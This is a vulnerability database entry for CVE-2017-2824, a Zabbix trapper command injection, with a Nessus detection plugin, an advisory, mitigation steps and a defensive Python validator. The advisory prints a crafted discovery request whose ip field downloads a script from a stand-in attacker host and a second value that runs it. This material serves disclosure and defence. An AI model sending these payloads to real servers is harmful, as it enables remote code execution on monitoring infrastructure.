CVE-2017-2824 - OS Command Injection vulnerability in Zabbix

CVSS 6.8 - MEDIUM
Attack vector: NETWORK
Attack complexity: MEDIUM
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: PARTIAL

Tags: network, zabbix, CWE-78, nessus

Summary

An exploitable code execution vulnerability exists in the trapper command functionality of Zabbix Server 2.4.X. A specially crafted set of packets can cause a command injection resulting in remote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability.

Common Attack Pattern Enumeration and Classification (CAPEC)

  • Command Line Execution through SQL Injection
    An attacker uses standard SQL injection methods to inject data into the command line for execution. This could be done directly through misuse of directives such as MSSQL_xp_cmdshell, or indirectly through injection of data into the database that would be interpreted as shell commands. Sometime later, an unscrupulous backend application (which could be part of the functionality of the same application) fetches the injected data stored in the database and uses it as command line arguments without performing proper validation. The malicious data escapes the data plane by spawning new commands to be executed on the host.
  • Command Delimiters
    An attack of this type exploits a program's vulnerabilities that allow an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. A system that uses a filter or blacklist for input validation, as opposed to whitelist validation, is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or blacklist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
  • Exploiting Multiple Input Interpretation Layers
    An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiple passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.
  • Argument Injection
    An attacker changes the behavior or state of a targeted application by injecting data or command syntax through the target's use of non-validated and non-filtered arguments of exposed services or methods.
  • OS Command Injection
    In this type of attack, an adversary injects operating system commands into existing application functions. An application that uses untrusted input to build command strings is vulnerable. An adversary can leverage OS command injection in an application to elevate privileges, execute arbitrary commands and compromise the underlying operating system.

Nessus

  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-5C8A4EBCCD.NASL
    description: - http://www.zabbix.com/rn3.0.8 - http://www.zabbix.com/rn3.0.9 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-07-17
    plugin id: 101639
    published: 2017-07-17
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/101639
    title: Fedora 26 : zabbix (2017-5c8a4ebccd)
    code:
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Fedora Security Advisory FEDORA-2017-5c8a4ebccd.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(101639);
      script_version("3.4");
      script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04");
    
      script_cve_id("CVE-2017-2824");
      script_xref(name:"FEDORA", value:"2017-5c8a4ebccd");
    
      script_name(english:"Fedora 26 : zabbix (2017-5c8a4ebccd)");
      script_summary(english:"Checks rpm output for the updated package.");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Fedora host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "- http://www.zabbix.com/rn3.0.8
    
    - http://www.zabbix.com/rn3.0.9
    
    - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308
    
    - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309
    
    Note that Tenable Network Security has extracted the preceding
    description block directly from the Fedora update system website.
    Tenable has attempted to automatically clean and format it as much as
    possible without introducing additional issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://bodhi.fedoraproject.org/updates/FEDORA-2017-5c8a4ebccd"
      );
      # https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?2ca35986"
      );
      script_set_attribute(
        attribute:"solution", 
        value:"Update the affected zabbix package."
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:zabbix");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:26");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/24");
      script_set_attribute(attribute:"patch_publication_date", value:"2017/07/07");
      script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/17");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Fedora Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");
    os_ver = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
    os_ver = os_ver[1];
    if (! preg(pattern:"^26([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 26", "Fedora " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
    
    
    flag = 0;
    if (rpm_check(release:"FC26", reference:"zabbix-3.0.9-1.fc26")) flag++;
    
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_WARNING,
        extra      : rpm_report_get()
      );
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "zabbix");
    }
    
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-63ACA509FB.NASL
    description: - http://www.zabbix.com/rn3.0.8 - http://www.zabbix.com/rn3.0.9 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-07-03
    plugin id: 101181
    published: 2017-07-03
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/101181
    title: Fedora 25 : zabbix (2017-63aca509fb)
  • NASL family: Debian Local Security Checks
    NASL id: DEBIAN_DSA-3937.NASL
    description: Lilith Wyatt discovered two vulnerabilities in the Zabbix network monitoring system which may result in execution of arbitrary code or database writes by malicious proxies.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102444
    published: 2017-08-14
    reporter: This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102444
    title: Debian DSA-3937-1 : zabbix - security update
  • NASL family: Fedora Local Security Checks
    NASL id: FEDORA_2017-D191FB7FCE.NASL
    description: - http://www.zabbix.com/rn3.0.8 - http://www.zabbix.com/rn3.0.9 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew308 - https://www.zabbix.com/documentation/3.0/manual/introduction/whatsnew309 Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen: 2020-06-05
    modified: 2017-07-03
    plugin id: 101184
    published: 2017-07-03
    reporter: This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/101184
    title: Fedora 24 : zabbix (2017-d191fb7fce)
  • NASL family: FreeBSD Local Security Checks
    NASL id: FREEBSD_PKG_5DF8BD95829011E793AF005056925DB4.NASL
    description: mitre reports : An exploitable code execution vulnerability exists in the trapper command functionality of Zabbix Server 2.4.X. A specially crafted set of packets can cause a command injection resulting in remote code execution. An attacker can make requests from an active Zabbix Proxy to trigger this vulnerability.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 102530
    published: 2017-08-17
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/102530
    title: FreeBSD : Zabbix -- Remote code execution (5df8bd95-8290-11e7-93af-005056925db4)
  • NASL family: CGI abuses
    NASL id: ZABBIX_FRONTEND_3_2_5.NASL
    description: According to its self-reported version number, the instance of Zabbix running on the remote host is 2.0.x prior to 2.0.21, 2.2.x prior to 2.2.18, 3.0.x prior to 3.0.9, or 3.2.x prior to 3.2.5. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists in the trapper command functionality due to improper handling of trapper packets. An unauthenticated, remote attacker can exploit this, via a specially crafted set of trapper packets, to inject arbitrary commands and execute arbitrary code. (CVE-2017-2824 / TALOS-2017-0325) - A security bypass vulnerability exists in the trapper command functionality due to improper handling of trapper packets. A man-in-the-middle (MitM) attacker can exploit this, via a specially crafted trapper packet, to bypass database security checks and write arbitrary data to the database. (CVE-2017-2825 / TALOS-2017-0326) Note that Nessus has not tested for these issues but has instead relied only on the application
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 100615
    published: 2017-06-05
    reporter: This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/100615
    title: Zabbix 2.0.x < 2.0.21 / 2.2.x < 2.2.18 / 3.0.x < 3.0.9 / 3.2.x < 3.2.5 Multiple Vulnerabilities
  • NASL family: Misc.
    NASL id: ZABBIX_SERVER_CVE-2017-2824.NASL
    description: The Zabbix server running on the remote host is affected by a remote command injection vulnerability due to the failure to sanitize the input data involving an IP address that would go into the
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 105042
    published: 2017-12-06
    reporter: This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.
    source: https://www.tenable.com/plugins/nessus/105042
    title: Zabbix Server 'active checks' Command Injection

Seebug

bulletinFamily: exploit
description: **Note**: an official patch was released earlier to fix these vulnerabilities; see also the related [Zabbix database write vulnerability](<https://www.seebug.org/vuldb/ssvid-93061>).

The vulnerability lies within the "Trapper" section of the Zabbix code, the network service that allows the proxies and the server to communicate (TCP port 10051). There is a set of API calls that the Zabbix Server exposes to the Zabbix proxy; the two discussed here are the "discovery data" and "command" requests. Example data for these requests is shown below:

```
'{"request":"command","scriptid":1,"hostid":10001}'
'{"request":"discovery data","host":"zabbix-proxy.com","clock":10,"data":[{"clock":10,"drule":1,"dcheck":2,"type":0,"ip":"10.0.0.1","dns":"zabbix-agent.com","port":10050,"key":"test","status":0,"value":"test_value"}]}'
```

It should be noted that the "command" request invokes a script located in the Zabbix database without any authentication occurring (which might be considered a bug in itself). Another pivotal aspect of the vulnerability is that, by default, Zabbix 2.4.X populates the MySQL database with three scripts inside of the scripts table:

```
# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1
# scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1
# scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1
```

The problem lies in the fact that the {HOST.CONN} field actually gets replaced by the host's IP address during the invocation of the script. The value that replaces {HOST.CONN} is located in the Zabbix "interface" table, stored in the "IP" field as a VARCHAR(64). Thus, if an attacker can create an interface with a command injection as the IP address, and a script containing {HOST.CONN} is run via the "command" request, the command injection will occur and a reverse shell can be gained. The difficulty lies in actually getting a valid entry into the Zabbix "host" table.

By default, an unauthenticated attacker cannot do this; it requires a minor configuration on the part of the system administrators, specifically in regards to Zabbix's Auto-discovery feature. Zabbix's Auto-discovery and Auto-registration features allow the configuration of the Zabbix Server to occur based on the data presented to the Zabbix Server by the Zabbix Proxy. More specifically, if a host presents certain characteristics to the Zabbix Proxy, then, based on the configuration of the server, certain actions could potentially be taken, one of which causes the newly discovered host to be added to certain Zabbix database tables. When this occurs, a host is inserted into the "hosts" table and an entry is also created in the Zabbix "interface" table, with the IP address presented by the host being inserted into the IP column without any validation of that IP address occurring. Thus, by sending a "discovery data" request to the server with a suitable host, a command injection can be inserted into the database:

```
write_script_cmd = '{ "request":"discovery data", "host":"zabbix-proxy.domain.fake", "clock":148535399, "data":[{ "clock":1485353070, "drule":88, "dcheck":174, "type":0, "ip":";wget -O /tmp/s http://attacker-ip/s;#", "dns":"host28.domain.fake", "port":10050, "key":"sectest", "status":0, "value":"lnx<(^_^)>host" }]}'
```

Due to the size limitation of the 'ip' field of the Zabbix "interface" table, a second host was inserted into the table with another IP address:

```
// The Host 2 "ip":";/bin/bash /tmp/s;#"
```

After these two hosts were added, there was still the issue of not knowing the hostids for the "command" request, but this was easily solved by brute forcing backwards into the database, since the command request returns a different response depending on whether the host actually exists; once the hostids of the injected hosts were known, they could be invoked directly and a reverse shell could be gained.

### Mitigation

By removing the three default script entries inside of the Zabbix Server's "Zabbix" database, an attacker would be unable to actually execute code, even if they can insert hosts with spoofed addresses into the database. This should not affect an organization's current operations, unless the scripts are actually used. This proposed fix can be done either directly from the database (`USE zabbix; DELETE FROM scripts;`) or from the GUI (Administration -> Scripts -> checkmarks -> "Delete Selected"/"Go").

### Credit

Discovered by Lilith Wyatt of the Cisco ASIG

### TIMELINE

2017-03-22 - Vendor Disclosure
2017-04-27 - Public Release
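The root cause described above is that the "ip" value of a "discovery data" request reaches the interface table, and later a shell command through {HOST.CONN}, without any validation. The following Python is an added example (not Zabbix, Talos or Seebug code) of the defensive checks a practitioner would want at each of those points: validating the request fields before storage, auditing existing interface rows for values that are not literal addresses, and substituting {HOST.CONN} into an argument vector that is executed without a shell. The request layout follows the advisory's example; the function names, the row layout of the audit input and the injected sample value are constructed assumptions.

```python
"""Added example, not Zabbix or Talos code: defensive checks around the
"discovery data" -> interface.ip -> {HOST.CONN} path the advisory describes.
Function names, the row layout of the audit input and the injected sample
value are constructed for illustration."""
import ipaddress
import json
import re

INTERFACE_IP_MAXLEN = 64  # interface.ip is a VARCHAR(64), per the advisory

# One DNS label: 1-63 letters, digits or hyphens, not starting or ending with a hyphen.
_LABEL_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_ip(value) -> bool:
    """True only for a literal IPv4/IPv6 address that fits the column."""
    if not isinstance(value, str) or not 0 < len(value) <= INTERFACE_IP_MAXLEN:
        return False
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return False
    return True


def is_valid_hostname(value) -> bool:
    """True for an RFC 1123 style hostname; shell metacharacters never pass."""
    if not isinstance(value, str) or not 0 < len(value) <= 253:
        return False
    return all(_LABEL_RE.match(label) for label in value.rstrip(".").split("."))


def validate_discovery_request(raw: str) -> dict:
    """Split the entries of a "discovery data" request into accepted and rejected.

    Rejected entries carry a reason so the caller can log them instead of
    writing them to the interface table.
    """
    req = json.loads(raw)
    if req.get("request") != "discovery data":
        raise ValueError("not a discovery data request")
    accepted, rejected = [], []
    for entry in req.get("data", []):
        if not is_valid_ip(entry.get("ip")):
            rejected.append((entry, "ip is not a literal IP address"))
        elif entry.get("dns") and not is_valid_hostname(entry["dns"]):
            rejected.append((entry, "dns is not a valid hostname"))
        else:
            accepted.append(entry)
    return {"accepted": accepted, "rejected": rejected}


def audit_interface_rows(rows) -> list:
    """Return the interfaceid of every row whose ip column is not a literal address.

    Constructed row layout: {"interfaceid": int, "ip": str}; in a real audit the
    rows would come from `SELECT interfaceid, ip FROM interface`.
    """
    return [row["interfaceid"] for row in rows if not is_valid_ip(row["ip"])]


def render_script_argv(template_argv, host_conn) -> list:
    """Substitute {HOST.CONN} into an argument vector meant for execve-style
    execution (subprocess.run(argv) without shell=True), refusing any value
    that is not a literal IP address or hostname."""
    if not (is_valid_ip(host_conn) or is_valid_hostname(host_conn)):
        raise ValueError(f"refusing to substitute non-address value {host_conn!r}")
    return [arg.replace("{HOST.CONN}", host_conn) for arg in template_argv]


# The legitimate request shown in the advisory.
GOOD_REQUEST = (
    '{"request":"discovery data","host":"zabbix-proxy.com","clock":10,'
    '"data":[{"clock":10,"drule":1,"dcheck":2,"type":0,"ip":"10.0.0.1",'
    '"dns":"zabbix-agent.com","port":10050,"key":"test","status":0,"value":"test_value"}]}'
)

# Constructed request whose ip field carries shell syntax instead of an address.
BAD_REQUEST = (
    '{"request":"discovery data","host":"zabbix-proxy.com","clock":10,'
    '"data":[{"clock":10,"drule":1,"dcheck":2,"type":0,"ip":"10.0.0.1; echo injected #",'
    '"dns":"zabbix-agent.com","port":10050,"key":"test","status":0,"value":"x"}]}'
)

# Constructed interface rows: row 3 is the kind of entry the attack leaves behind.
SAMPLE_ROWS = [
    {"interfaceid": 1, "ip": "10.0.0.1"},
    {"interfaceid": 2, "ip": "192.168.1.20"},
    {"interfaceid": 3, "ip": "10.0.0.1; echo injected #"},
]

if __name__ == "__main__":
    print(validate_discovery_request(GOOD_REQUEST)["accepted"])
    print([reason for _, reason in validate_discovery_request(BAD_REQUEST)["rejected"]])
    print("suspicious interfaceids:", audit_interface_rows(SAMPLE_ROWS))
    print(render_script_argv(["/bin/ping", "-c", "3", "{HOST.CONN}"], "10.0.0.1"))
```

The audit function is the check worth running against an existing 2.4.x server: any interface row whose ip column is not a literal address is either misconfiguration or evidence that the discovery path was abused. Removing the default scripts, as the advisory recommends, closes the sink; validating at ingest and rendering into an argv without a shell closes the source and the substitution step as well.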
id: SSV:93060
last seen: 2017-11-19
modified: 2017-04-28
published: 2017-04-28
reporter: Root
title: Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability (CVE-2017-2824)

Talos

id: TALOS-2017-0325
last seen: 2019-05-29
published: 2017-04-27
reporter: Talos Intelligence
source: http://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0325
title: Zabbix Server Active Proxy Trapper Remote Code Execution Vulnerability